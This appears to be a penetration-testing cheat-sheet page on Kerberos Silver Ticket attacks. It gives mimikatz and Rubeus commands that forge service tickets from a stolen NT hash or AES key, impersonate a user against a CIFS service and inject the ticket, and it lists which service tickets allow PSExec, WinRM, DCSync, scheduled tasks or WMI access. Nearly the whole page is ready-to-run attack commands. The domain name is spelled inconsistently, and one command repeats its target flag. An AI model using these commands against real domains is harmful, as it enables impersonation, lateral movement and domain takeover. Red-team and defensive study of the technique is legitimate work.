Silver Ticket

# mimikatz
kerberos::golden /domain:vulnablone.local /sid:S-1-5-21-709665108-487177485-3575070505 /rc4:NThash /user:$impersonate_user /target:SRV01.vulnableone.local /service:CIFS /ptt

kerberos::golden /domain:vulnablone.local /sid:S-1-5-21-709665108-487177485-3575070505 /aes128:AES128_key /user:$impersonate_user /service:CIFS /target:SRV01.vulnableone.local /ptt

kerberos::golden /domain:vulnablone.local /sid:S-1-5-21-709665108-487177485-3575070505 /aes256:AES256_key /user:$impersonate_user /target:CIFS /target:SRV01.vulnableone.local /service:CIFS /ptt

# Rubeus
Rubeus.exe silver /service:cifs/SRV01.vulnableone.local /aes256:AES256_Key /user:$impersonate_user /domain:vulnablone.local /sid:S-1-5-21-709665108-487177485-3575070505 /ptt /nowrap

Technique

PSExec

Required Service Tickets

CIFS

Technique

winrm

Required Service Tickets

HOST & HTTP

Technique

dcsync (DCs only)

Required Service Tickets

LDAP

Technique

Schtasks

Required Service Tickets

HOST

Technique

WMI interactions

Required Service Tickets

HOST & RPCSS

PreviousSteal or Forge Kerberos Tickets NextGolden Ticket

Last updated 1 year ago